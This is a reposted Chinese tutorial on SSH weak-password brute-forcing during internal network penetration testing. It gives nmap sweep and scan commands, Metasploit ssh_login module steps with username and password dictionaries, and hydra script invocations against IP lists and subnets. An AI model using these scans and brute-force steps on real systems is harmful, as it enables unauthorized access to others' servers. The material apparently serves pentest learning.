內網滲透-ssh 22號端口弱密碼爆破


1、收集IP信息:

(1)獲取內網IP地址段,使用ping 內網系統的域名,得到內網IP地址段:

(2)使用: nmap -sP 192.168.10.0/24 網段內活着的IP地址:發現活着的IP主機有256個,即192.168.10.0-192.168.10.255

  nmap具體使用方法可以參考: https://www.cnblogs.com/justn0w/articles/10177612.html

 

2、掃描開放22端口的IP:

(1)將收集到的活着的ip放到一個txt文件夾中,利用:nmap -iL ip.txt 進行批量掃描端口;
(2)使用:nmap -PR -oN /home/xh/shentou/out.log 192.168.10.0/24 直接 掃描一個網段內所有的iP,掃描的結果會保存在out.log里面;

3.使用Metasploit工具進行ssh爆破:

參考:https://blog.csdn.net/Tahir_111/article/details/82389570?depth_1-utm_source=distribute.pc_relevant.none-task&utm_source=distribute.pc_relevant.none-task

(1)在kali機器中,在終端輸入msfconsole,打開metasploit工具;

 

(2)先打開MSF 進入ssh_login模塊 show options查看提示。本次使用用戶字典和密碼字典進行ssh爆破。
終端輸入: use auxiliary/scanner/ssh_login

 

(3)  show options

 

(4) 准備進行ssh爆破;
設置用戶名字典和密碼字典的路徑;設置靶機的IP地址;設置線程為20;開始執行;

4、使用hydra批量IP主機爆破:

可以參考: https://www.freebuf.com/sectool/170779.html進行批量破解;

./hydra.sh -p ./password.txt -f ./iplist.txt #對文件中的IP進行破解
./hydra.sh -p ./password.txt -l 192.168.9.0/24 #對網段中的IP進行破解
如下:sudo sh hydra.sh -p /home/xh/shentou/pwd_ssh1.txt -f /home/xh/shentou/22_iplist.txt

 

 


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM